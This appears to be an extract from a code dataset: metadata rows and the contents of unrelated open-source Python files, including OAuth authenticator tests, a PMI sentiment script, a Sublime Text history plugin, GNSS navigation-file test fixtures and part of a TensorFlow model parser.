print('Time Taken: ', time()-t)
# true = DTLZ2(n_dec=30, n_obj=3).get_pareto()
m = measure(model=DTLZ2(n_dec=30, n_obj=3))
conv = m.convergence(ret)
print("Convergence:",conv)
# set_trace()
return
if __name__=="__main__":
eval(cmd()) | 2,165 | 0 | 194 |
72ff83346d8d3330659ad8dff6135283c056fe91 | 2,441 | py | Python | oauthenticator/tests/test_bitbucket.py | jeff-sternberg/oauthenticator | 158eb206dd2b59961442a4d3b67fbbb179a3030a | [
"BSD-3-Clause"
] | 4 | 2019-09-17T08:10:57.000Z | 2020-09-03T21:27:21.000Z | oauthenticator/tests/test_bitbucket.py | jeff-sternberg/oauthenticator | 158eb206dd2b59961442a4d3b67fbbb179a3030a | [
"BSD-3-Clause"
] | 2 | 2017-05-02T18:44:55.000Z | 2017-10-06T15:11:23.000Z | oauthenticator/tests/test_bitbucket.py | jeff-sternberg/oauthenticator | 158eb206dd2b59961442a4d3b67fbbb179a3030a | [
"BSD-3-Clause"
] | 4 | 2019-09-27T03:22:44.000Z | 2021-01-20T08:47:34.000Z | import os
from unittest.mock import patch
from pytest import fixture, mark
from ..bitbucket import BitbucketOAuthenticator
from .mocks import setup_oauth_mock
def user_model(username):
"""Return a user model"""
return {
'username': username,
}
@fixture
| 29.409639 | 68 | 0.669398 | import os
from unittest.mock import patch
from pytest import fixture, mark
from ..bitbucket import BitbucketOAuthenticator
from .mocks import setup_oauth_mock
def user_model(username):
"""Return a user model"""
return {
'username': username,
}
@fixture
def bitbucket_client(client):
setup_oauth_mock(client,
host=['bitbucket.org', 'api.bitbucket.org'],
access_token_path='/site/oauth2/access_token',
user_path='/2.0/user',
)
return client
async def test_bitbucket(bitbucket_client):
authenticator = BitbucketOAuthenticator()
handler = bitbucket_client.handler_for_user(user_model('yorba'))
user_info = await authenticator.authenticate(handler)
assert sorted(user_info) == ['auth_state', 'name']
name = user_info['name']
assert name == 'yorba'
auth_state = user_info['auth_state']
assert 'access_token' in auth_state
assert 'bitbucket_user' in auth_state
async def test_team_whitelist(bitbucket_client):
client = bitbucket_client
authenticator = BitbucketOAuthenticator()
authenticator.bitbucket_team_whitelist = ['blue']
teams = {
'red': ['grif', 'simmons', 'donut', 'sarge', 'lopez'],
'blue': ['tucker', 'caboose', 'burns', 'sheila', 'texas'],
}
def list_teams(request):
token = request.headers['Authorization'].split(None, 1)[1]
username = client.access_tokens[token]['username']
values = []
for team, members in teams.items():
if username in members:
values.append({'username': team})
return {
'values': values
}
client.hosts['api.bitbucket.org'].append(
('/2.0/teams', list_teams)
)
handler = client.handler_for_user(user_model('caboose'))
user_info = await authenticator.authenticate(handler)
name = user_info['name']
assert name == 'caboose'
handler = client.handler_for_user(user_model('donut'))
name = await authenticator.authenticate(handler)
assert name is None
# reverse it, just to be safe
authenticator.team_whitelist = ['red']
handler = client.handler_for_user(user_model('caboose'))
name = await authenticator.authenticate(handler)
assert name is None
handler = client.handler_for_user(user_model('donut'))
user_info = await authenticator.authenticate(handler)
name = user_info['name']
assert name == 'donut'
| 2,092 | 0 | 68 |
614f2ffc9bfb0c9d3e4e2692c37311ee02f72bbd | 2,429 | py | Python | stockmarket/tests/test_switchingstrategies.py | lbolla/Agent-Based-Stock-Market-Model | 6ff9549b2082371778632f4ad23a12f42c24cccd | [
"MIT"
] | 15 | 2018-06-10T13:08:47.000Z | 2022-01-19T05:55:01.000Z | stockmarket/tests/test_switchingstrategies.py | lbolla/Agent-Based-Stock-Market-Model | 6ff9549b2082371778632f4ad23a12f42c24cccd | [
"MIT"
] | 45 | 2017-01-26T10:54:40.000Z | 2017-09-12T14:23:01.000Z | stockmarket/tests/test_switchingstrategies.py | lbolla/Agent-Based-Stock-Market-Model | 6ff9549b2082371778632f4ad23a12f42c24cccd | [
"MIT"
] | 5 | 2018-11-04T17:49:58.000Z | 2021-12-23T03:09:36.000Z | import pytest
from stockmarket.agent import Trader
from stockmarket.switchingstrategies import *
from stockmarket.valuationfunctions import *
from numpy.testing import assert_equal
from numpy.testing import assert_raises
@pytest.fixture()
| 63.921053 | 120 | 0.70317 | import pytest
from stockmarket.agent import Trader
from stockmarket.switchingstrategies import *
from stockmarket.valuationfunctions import *
from numpy.testing import assert_equal
from numpy.testing import assert_raises
@pytest.fixture()
def agents():
return [Trader(name="Agent1", money=1000, bid_ask_spread=0, ma_short=2, ma_long=3,
valuation_function=lambda **x: extrapolate_average_profit(**x), propensity_to_switch=1.1,
price_to_earnings_window=(6, 12), trader_volume_risk_aversion=0.1),
Trader(name="Agent2", money=1000, bid_ask_spread=0, ma_short=2, ma_long=3,
valuation_function=lambda **x: extrapolate_ma_price(**x), propensity_to_switch=1.1,
price_to_earnings_window=(6, 12), trader_volume_risk_aversion=0.1),
Trader(name="WeirdAgent", money=1000, bid_ask_spread=0, ma_short=2, ma_long=3,
valuation_function=None, propensity_to_switch=1.1,
price_to_earnings_window=(6, 12), trader_volume_risk_aversion=0.1)]
def test_adaptive_switching(agents):
# a none chartist and non fundamentalist agent should raise a value error
assert_raises(ValueError, adaptive_switching, agents[-1], 1.1, 0.04, 0.03)
# the fundamentalist agent does not switch strategy if it did not mis any returns
# assert_equal(adaptive_switching(agent=agents[0], propensity_to_switch=0.3, realised_returns=0.04,
# possibly_realised_returns=0.03), agents[0].function)
# the chartist agent does not switch strategy if it did not miss any returns
# assert_equal(adaptive_switching(agent=agents[1], propensity_to_switch=0.3, realised_returns=0.04,
# possibly_realised_returns=0.03), agents[1].function)
# the fund agent switches strategies for sure as possibly realised returns are 100% bigger than realised returns
# assert_equal(adaptive_switching(agent=agents[0], propensity_to_switch=2, realised_returns=0,
# possibly_realised_returns=1), agents[1].function)
# the chartist agent switches strategies for sure as possibly realised returns are 100% bigger than realised returns
# assert_equal(adaptive_switching(agent=agents[1], propensity_to_switch=2, realised_returns=0,
# possibly_realised_returns=1), agents[0].function) | 2,142 | 0 | 45 |
92f64bf7bd58edbbd33babc4dc0d18c33704d313 | 2,823 | py | Python | pmi/pmi_odds.py | rogersprates/word2vec-financial-sentiment | 42172b47dc0a5d228e473bd34d15a9aa59c43537 | [
"MIT"
] | 2 | 2018-11-16T13:44:24.000Z | 2021-09-23T23:54:34.000Z | pmi/pmi_odds.py | dimiiako/word2vec-financial-sentiment | 42172b47dc0a5d228e473bd34d15a9aa59c43537 | [
"MIT"
] | null | null | null | pmi/pmi_odds.py | dimiiako/word2vec-financial-sentiment | 42172b47dc0a5d228e473bd34d15a9aa59c43537 | [
"MIT"
] | 3 | 2017-04-12T07:00:23.000Z | 2021-11-27T03:43:33.000Z | """pmi_odds.py: computes the PMI (Pointwise mutual information) with odds
"""
import json
import os
from probabilities import pmi_odds
__author__ = "Edimar Manica"
| 33.607143 | 91 | 0.680482 | """pmi_odds.py: computes the PMI (Pointwise mutual information) with odds
"""
import json
import os
from probabilities import pmi_odds
__author__ = "Edimar Manica"
def create_vocabulary(news):
vocabulary = []
for ide in news:
vocabulary = vocabulary + news[ide]["text"]
return set(vocabulary)
def frequencies(news, vocabulary):
positive_words = dict.fromkeys(vocabulary, 0.0)
negative_words = dict.fromkeys(vocabulary, 0.0)
pn = 0; #number of POSITIVE news
nn = 0; #number of NEGATIVE news
for id in news:
if news[id]["label"] == "positive":
pn += 1
for w in set(news[id]["text"]):
positive_words[w] += 1.0
else:
nn += 1
for w in set(news[id]["text"]):
negative_words[w] += 1.0
return pn, nn, positive_words, negative_words
def pmi_odd(path_input,path_output):
with open(path_input, "r") as news_file:
training_set = json.load(news_file)
#print(training_set)
vocabulary = create_vocabulary(training_set)
#print(vocabulary)
pn, nn, positive_words, negative_words = frequencies(training_set, vocabulary)
#print (pn, nn, positive_words, negative_words)
terms = {"positive":[], "negative":[]}
for word in vocabulary:
#print (word, pn, nn, positive_words[word], negative_words[word])
positive_pmi = pmi_odds(positive_words[word], pn, negative_words[word], nn)
terms["positive"].append((word, positive_pmi))
negative_pmi = pmi_odds(negative_words[word], nn, positive_words[word], pn)
terms["negative"].append((word, negative_pmi))
terms["positive"].sort(key=lambda tup: tup[1], reverse=True)
terms["negative"].sort(key=lambda tup: tup[1], reverse=True)
with open(path_output, "w") as terms_file:
json.dump(terms, terms_file)
def pmi_odds_daily():
#train data
path_datatrain_json_1=os.getcwd() +'/../files/training_with_duplicates.json'
path_datatrain_json_2=os.getcwd() +'/../files/training_without_duplicates.json'
#output kterms
pathoutput_k_terms3 = os.getcwd() +'/../files/terms03.json'
pathoutput_k_terms4 = os.getcwd() +'/../files/terms04.json'
pmi_odd(path_datatrain_json_1,pathoutput_k_terms3)
pmi_odd(path_datatrain_json_2,pathoutput_k_terms4)
def pmi_odds_weekly():
#train data
path_datatrain_json_1=os.getcwd() +'/../files2/weekly_with_duplicates_training.json'
path_datatrain_json_2=os.getcwd() +'/../files2/weekly_without_duplicates_training.json'
#output kterms
pathoutput_k_terms3 = os.getcwd() +'/../files2/terms03.json'
pathoutput_k_terms4 = os.getcwd() +'/../files2/terms04.json'
pmi_odd(path_datatrain_json_1,pathoutput_k_terms3)
pmi_odd(path_datatrain_json_2,pathoutput_k_terms4)
| 2,536 | 0 | 115 |
407bdee7a7f86e022e7da89584d22b5150934f0d | 2,332 | py | Python | hist.py | lclutz/sublime-text-shell-command | 846e1d04c20fba7612d8073e8b1b19439f4ab559 | [
"MIT"
] | 96 | 2015-01-06T17:37:21.000Z | 2022-02-14T11:14:11.000Z | hist.py | lclutz/sublime-text-shell-command | 846e1d04c20fba7612d8073e8b1b19439f4ab559 | [
"MIT"
] | 50 | 2015-01-01T13:26:24.000Z | 2021-12-20T01:04:18.000Z | hist.py | lclutz/sublime-text-shell-command | 846e1d04c20fba7612d8073e8b1b19439f4ab559 | [
"MIT"
] | 27 | 2015-02-12T18:17:22.000Z | 2022-03-31T03:03:27.000Z | # NOTE(kaste): Take from https://github.com/randy3k/AlignTab
# Copyright (c) 2015 Randy Lai <randy.cs.lai@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sublime
import sublime_plugin
if 'history' not in globals():
history = History()
| 35.333333 | 87 | 0.691681 | # NOTE(kaste): Take from https://github.com/randy3k/AlignTab
# Copyright (c) 2015 Randy Lai <randy.cs.lai@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sublime
import sublime_plugin
class History:
hist = []
index = None
def insert(self, user_input):
if not self.hist or (user_input != self.last() and user_input != "last_regex"):
self.hist.append(user_input)
self.index = None
def roll(self, backwards=False):
if self.index is None:
self.index = -1 if backwards else 0
else:
self.index += -1 if backwards else 1
if self.index == len(self.hist) or self.index < -len(self.hist):
self.index = -1 if backwards else 0
def last(self):
return self.hist[-1] if self.hist else None
def get(self, index=None):
if not index:
index = self.index
return self.hist[index] if self.hist else None
def reset_index(self):
self.index = None
if 'history' not in globals():
history = History()
class ShellCommandHistory(sublime_plugin.TextCommand):
def run(self, edit, backwards=False):
history.roll(backwards)
self.view.erase(edit, sublime.Region(0, self.view.size()))
self.view.insert(edit, 0, history.get())
| 796 | 192 | 72 |
f20ec0d8e0574b5719072252566350a189a75043 | 336 | py | Python | testtools/UART_interface/serial_settings.py | cbauer10/azure-iot-sdk-c | 2080c8b537f31b72b8668ba3bb8c6772da55d63a | [
"MIT"
] | 545 | 2016-11-29T18:04:48.000Z | 2022-03-28T09:31:06.000Z | testtools/UART_interface/serial_settings.py | cbauer10/azure-iot-sdk-c | 2080c8b537f31b72b8668ba3bb8c6772da55d63a | [
"MIT"
] | 1,644 | 2016-11-17T09:49:31.000Z | 2022-03-30T18:10:13.000Z | testtools/UART_interface/serial_settings.py | cbauer10/azure-iot-sdk-c | 2080c8b537f31b72b8668ba3bb8c6772da55d63a | [
"MIT"
] | 826 | 2016-11-16T16:05:16.000Z | 2022-03-18T19:23:22.000Z | baud_rate = 115200
port = "/dev/ttyACM1"
input_file=None
output_file='log.txt'
wait_for_flash = 10
bits_to_cache = 1600
mxchip_file = "/media/newt/AZ31665"
setup_string = "Setup complete"
skip_setup = False
mxchip_buf_pause = .06
serial_comm_timeout = 2
device_type = 'mxchip'
test_timeout = None
reset_device = False
tests_run = False
| 21 | 35 | 0.779762 | baud_rate = 115200
port = "/dev/ttyACM1"
input_file=None
output_file='log.txt'
wait_for_flash = 10
bits_to_cache = 1600
mxchip_file = "/media/newt/AZ31665"
setup_string = "Setup complete"
skip_setup = False
mxchip_buf_pause = .06
serial_comm_timeout = 2
device_type = 'mxchip'
test_timeout = None
reset_device = False
tests_run = False
| 0 | 0 | 0 |
84807805d4c9e99301ea9459dc3f1a877cc0d1c9 | 428 | py | Python | pulsar/async/_subprocess.py | PyCN/pulsar | fee44e871954aa6ca36d00bb5a3739abfdb89b26 | [
"BSD-3-Clause"
] | 1,410 | 2015-01-02T14:55:07.000Z | 2022-03-28T17:22:06.000Z | pulsar/async/_subprocess.py | PyCN/pulsar | fee44e871954aa6ca36d00bb5a3739abfdb89b26 | [
"BSD-3-Clause"
] | 194 | 2015-01-22T06:18:24.000Z | 2020-10-20T21:21:58.000Z | pulsar/async/_subprocess.py | PyCN/pulsar | fee44e871954aa6ca36d00bb5a3739abfdb89b26 | [
"BSD-3-Clause"
] | 168 | 2015-01-31T10:29:55.000Z | 2022-03-14T10:22:24.000Z |
if __name__ == '__main__':
import sys
import pickle
from multiprocessing import current_process
from multiprocessing.spawn import import_main_path
data = pickle.load(sys.stdin.buffer)
current_process().authkey = data['authkey']
sys.path = data['path']
import_main_path(data['main'])
impl = pickle.loads(data['impl'])
from pulsar.async.concurrency import run_actor
run_actor(impl)
| 25.176471 | 54 | 0.705607 |
if __name__ == '__main__':
import sys
import pickle
from multiprocessing import current_process
from multiprocessing.spawn import import_main_path
data = pickle.load(sys.stdin.buffer)
current_process().authkey = data['authkey']
sys.path = data['path']
import_main_path(data['main'])
impl = pickle.loads(data['impl'])
from pulsar.async.concurrency import run_actor
run_actor(impl)
| 0 | 0 | 0 |
59627c56bf8f3b4b82db7818b4d48287abf4a605 | 5,750 | py | Python | tests/conftest.py | ilya-e/coordinates | 328ef6f07450592524b49c71a0859c3b1d1fd489 | [
"MIT"
] | null | null | null | tests/conftest.py | ilya-e/coordinates | 328ef6f07450592524b49c71a0859c3b1d1fd489 | [
"MIT"
] | 4 | 2019-05-15T10:24:48.000Z | 2022-01-28T01:14:55.000Z | tests/conftest.py | ilya-e/coordinates | 328ef6f07450592524b49c71a0859c3b1d1fd489 | [
"MIT"
] | 5 | 2017-12-23T09:48:07.000Z | 2022-03-17T05:52:02.000Z | from io import StringIO
import pytest
from testlib import mktmp
_nav_content_v2 = '''\
2 NAVIGATION DATA RINEX VERSION / TYPE
CCRINEXN V1.6.0 UX CDDIS 12-APR-16 17:31 PGM / RUN BY / DATE
IGS BROADCAST EPHEMERIS FILE COMMENT
0.1583D-07 0.1490D-07 -0.1192D-06 -0.1192D-06 ION ALPHA
0.1065D+06 0.6554D+05 -0.1966D+06 -0.1966D+06 ION BETA
0.186264514923D-08 0.000000000000D+00 233472 1892 DELTA-UTC: A0,A1,T,W
17 LEAP SECONDS
END OF HEADER
1 16 4 11 0 0 0.0 0.169607810676D-04 0.113686837722D-11 0.000000000000D+00
0.350000000000D+02 0.222500000000D+02 0.482198656938D-08 0.368417754673D+00
0.121630728245D-05 0.527631223667D-02 0.668689608574D-05 0.515364252472D+04
0.864000000000D+05 0.391155481338D-07-0.140616900879D+01 0.106170773506D-06
0.963711739811D+00 0.247687500000D+03 0.450110393247D+00-0.827070165078D-08
0.284654714154D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00 0.512227416039D-08 0.350000000000D+02
0.805020000000D+05 0.400000000000D+01 0.000000000000D+00 0.000000000000D+00
2 16 4 11 0 0 0.0 0.597649253905D-03-0.181898940355D-11 0.000000000000D+00
0.830000000000D+02 0.185937500000D+02 0.527057686384D-08 0.763017673126D+00
0.114180147648D-05 0.156129685929D-01 0.783614814282D-05 0.515374914742D+04
0.864000000000D+05-0.163912773132D-06-0.145069785349D+01 0.100582838059D-06
0.942463959213D+00 0.223656250000D+03-0.213318032835D+01-0.861071569602D-08
0.216080431326D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00-0.200234353542D-07 0.830000000000D+02
0.864000000000D+05 0.000000000000D+00 0.000000000000D+00 0.000000000000D+00
'''
_nav_content_v3 = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
Merged GPS/GLO/GAL/BDS/QZS/SBAS/IRNSS navigation file COMMENT
based on CONGO and MGEX tracking data COMMENT
DLR: O. Montenbruck; TUM: P. Steigenberger COMMENT
GAUT 2.7939677238e-09 1.776356839e-15 345600 1965 TIME SYSTEM CORR
GLGP 1.8626451492e-08 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GLUT 9.3132257462e-10 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GPGA 1.0040821508e-08 3.330669074e-14 432000 1965 TIME SYSTEM CORR
GPUT 9.3132257462e-10 1.776356839e-15 589824 1965 TIME SYSTEM CORR
QZUT 6.5192580223e-09 0.000000000e+00 8192 1966 TIME SYSTEM CORR
18 LEAP SECONDS
END OF HEADER
G01 2017 09 08 00 00 00 5.530333146453e-05-4.547473508865e-13 0.000000000000e+00
7.200000000000e+01-2.653125000000e+01 4.883774857397e-09-2.309091328065e-01
-1.233071088791e-06 7.021094555967e-03 2.788379788399e-06 5.153673307419e+03
4.320000000000e+05 7.823109626770e-08 2.011192878165e+00 4.284083843231e-08
9.681868691207e-01 3.310000000000e+02 6.192489497701e-01-8.576071513516e-09
-2.500104139373e-11 1.000000000000e+00 1.965000000000e+03 0.000000000000e+00
2.000000000000e+00 0.000000000000e+00 5.587935447693e-09 7.200000000000e+01
4.248180000000e+05 4.000000000000e+00
S20 2017 09 08 00 16 32 0.000000000000e+00 0.000000000000e+00 4.330030000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.150000000000e+02
'''
_nav_content_v3_unsorted = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
18 LEAP SECONDS
END OF HEADER
S20 2017 09 08 00 05 52 0.000000000000e+00 0.000000000000e+00 4.323620000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.200000000000e+01
S20 2017 09 08 00 00 32 0.000000000000e+00 0.000000000000e+00 4.320410000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.000000000000e+00
S20 2017 09 08 00 03 12 0.000000000000e+00 0.000000000000e+00 4.322000000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 1.200000000000e+01
'''
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
| 55.288462 | 80 | 0.669217 | from io import StringIO
import pytest
from testlib import mktmp
_nav_content_v2 = '''\
2 NAVIGATION DATA RINEX VERSION / TYPE
CCRINEXN V1.6.0 UX CDDIS 12-APR-16 17:31 PGM / RUN BY / DATE
IGS BROADCAST EPHEMERIS FILE COMMENT
0.1583D-07 0.1490D-07 -0.1192D-06 -0.1192D-06 ION ALPHA
0.1065D+06 0.6554D+05 -0.1966D+06 -0.1966D+06 ION BETA
0.186264514923D-08 0.000000000000D+00 233472 1892 DELTA-UTC: A0,A1,T,W
17 LEAP SECONDS
END OF HEADER
1 16 4 11 0 0 0.0 0.169607810676D-04 0.113686837722D-11 0.000000000000D+00
0.350000000000D+02 0.222500000000D+02 0.482198656938D-08 0.368417754673D+00
0.121630728245D-05 0.527631223667D-02 0.668689608574D-05 0.515364252472D+04
0.864000000000D+05 0.391155481338D-07-0.140616900879D+01 0.106170773506D-06
0.963711739811D+00 0.247687500000D+03 0.450110393247D+00-0.827070165078D-08
0.284654714154D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00 0.512227416039D-08 0.350000000000D+02
0.805020000000D+05 0.400000000000D+01 0.000000000000D+00 0.000000000000D+00
2 16 4 11 0 0 0.0 0.597649253905D-03-0.181898940355D-11 0.000000000000D+00
0.830000000000D+02 0.185937500000D+02 0.527057686384D-08 0.763017673126D+00
0.114180147648D-05 0.156129685929D-01 0.783614814282D-05 0.515374914742D+04
0.864000000000D+05-0.163912773132D-06-0.145069785349D+01 0.100582838059D-06
0.942463959213D+00 0.223656250000D+03-0.213318032835D+01-0.861071569602D-08
0.216080431326D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00-0.200234353542D-07 0.830000000000D+02
0.864000000000D+05 0.000000000000D+00 0.000000000000D+00 0.000000000000D+00
'''
_nav_content_v3 = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
Merged GPS/GLO/GAL/BDS/QZS/SBAS/IRNSS navigation file COMMENT
based on CONGO and MGEX tracking data COMMENT
DLR: O. Montenbruck; TUM: P. Steigenberger COMMENT
GAUT 2.7939677238e-09 1.776356839e-15 345600 1965 TIME SYSTEM CORR
GLGP 1.8626451492e-08 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GLUT 9.3132257462e-10 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GPGA 1.0040821508e-08 3.330669074e-14 432000 1965 TIME SYSTEM CORR
GPUT 9.3132257462e-10 1.776356839e-15 589824 1965 TIME SYSTEM CORR
QZUT 6.5192580223e-09 0.000000000e+00 8192 1966 TIME SYSTEM CORR
18 LEAP SECONDS
END OF HEADER
G01 2017 09 08 00 00 00 5.530333146453e-05-4.547473508865e-13 0.000000000000e+00
7.200000000000e+01-2.653125000000e+01 4.883774857397e-09-2.309091328065e-01
-1.233071088791e-06 7.021094555967e-03 2.788379788399e-06 5.153673307419e+03
4.320000000000e+05 7.823109626770e-08 2.011192878165e+00 4.284083843231e-08
9.681868691207e-01 3.310000000000e+02 6.192489497701e-01-8.576071513516e-09
-2.500104139373e-11 1.000000000000e+00 1.965000000000e+03 0.000000000000e+00
2.000000000000e+00 0.000000000000e+00 5.587935447693e-09 7.200000000000e+01
4.248180000000e+05 4.000000000000e+00
S20 2017 09 08 00 16 32 0.000000000000e+00 0.000000000000e+00 4.330030000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.150000000000e+02
'''
_nav_content_v3_unsorted = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
18 LEAP SECONDS
END OF HEADER
S20 2017 09 08 00 05 52 0.000000000000e+00 0.000000000000e+00 4.323620000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.200000000000e+01
S20 2017 09 08 00 00 32 0.000000000000e+00 0.000000000000e+00 4.320410000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.000000000000e+00
S20 2017 09 08 00 03 12 0.000000000000e+00 0.000000000000e+00 4.322000000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 1.200000000000e+01
'''
@pytest.fixture
def nav_file_v2():
return mktmp(_nav_content_v2)
@pytest.fixture
def nav_iter_v2():
return StringIO(_nav_content_v2)
@pytest.fixture
def nav_file_v3():
return mktmp(_nav_content_v3)
@pytest.fixture
def nav_iter_v3():
return StringIO(_nav_content_v3)
@pytest.fixture
def nav_file_unsorted_v3():
return mktmp(_nav_content_v3_unsorted)
| 179 | 0 | 110 |
dbbcbe484440229c47401ead61b8028c24591e0c | 83,613 | py | Python | tool/Controllers/TensorFlowParser.py | HornedSungem/SungemSDK-Python | 5ce5eb7f84654aecf6840de773188f436219559d | [
"Apache-2.0"
] | 14 | 2018-08-16T09:11:39.000Z | 2019-12-07T12:54:32.000Z | movidius/NCSDK/ncsdk-x86_64/tk/Controllers/TensorFlowParser.py | satabios/Yolo-implementation-using-Intel-Movidius-Neural-Compute-Stick-NCS-on-Raspberry-Pi | 79b410b5a4c6deea209ef999a97c5e32da58653f | [
"MIT"
] | 2 | 2019-08-23T23:31:10.000Z | 2020-06-17T09:21:57.000Z | tool/Controllers/TensorFlowParser.py | HornedSungem/SungemSDK-Python | 5ce5eb7f84654aecf6840de773188f436219559d | [
"Apache-2.0"
] | 7 | 2018-10-02T01:46:43.000Z | 2021-06-04T19:10:47.000Z | # Copyright 2017 Intel Corporation.
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors.
# The Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions.
# No part of the Material may be used, copied, reproduced, modified, published,
# uploaded, posted, transmitted, distributed or disclosed in any way without
# Intel's prior express written permission. No license under any patent,
# copyright or other intellectual property rights in the Material is granted to
# or conferred upon you, either expressly, by implication, inducement, estoppel
# or otherwise.
# Any license under such intellectual property rights must be express and
# approved by Intel in writing.
import sys
import tensorflow as tf
import google.protobuf as proto
import numpy as np
import math
import re
from Models.Network import *
from Models.NetworkStage import *
from Models.EnumDeclarations import *
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from Controllers.TensorFlowPreproc import TFPreprocessor
from Controllers.TensorFlowPreproc import PatternType
sys.setrecursionlimit(5000)
placeholder_dict = {}
const_dict = {}
node_dict = {}
variable_dict = {}
concat_tracker = []
reshape_tracker = []
identity_tracker = []
padding_tracker = []
inputnode = 'input'
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
def same_padding(in_dim, kernel_dim, stride_dim):
"""
Calculates the output dimension and also the padding required for that dimension.
:param in_dim: Width/Height of Input
:param kernel_dim: Width/Height of Kernel
:param stride_dim: Vertical/Horizontal Stride
"""
output_dim = math.ceil(float(in_dim) / float(stride_dim))
pad = ((output_dim - 1) * stride_dim + kernel_dim - in_dim) / 2
return output_dim, pad
def get_deconv_padding(input_shape, output_shape, kernel_shape, stride):
"""
input_shape: N,H,W,C
output_shape: N,H,W,C
kernel_shape: kh,kw
stride: 1,sh,sw,sc
"""
pady = 0
padx = 0
# 2Xpad = stride X (input - 1) + kernel - out
pady = stride[1] * (input_shape[1] - 1) + kernel_shape[0] - output_shape[1]
padx = stride[2] * (input_shape[2] - 1) + kernel_shape[1] - output_shape[2]
if (pady % 2 == 1):
pady = -1
else:
pady = pady / 2
if (padx % 2 == 1):
padx = -1
else:
padx = padx / 2
return int(pady), int(padx)
# Count how many times we need this as an input
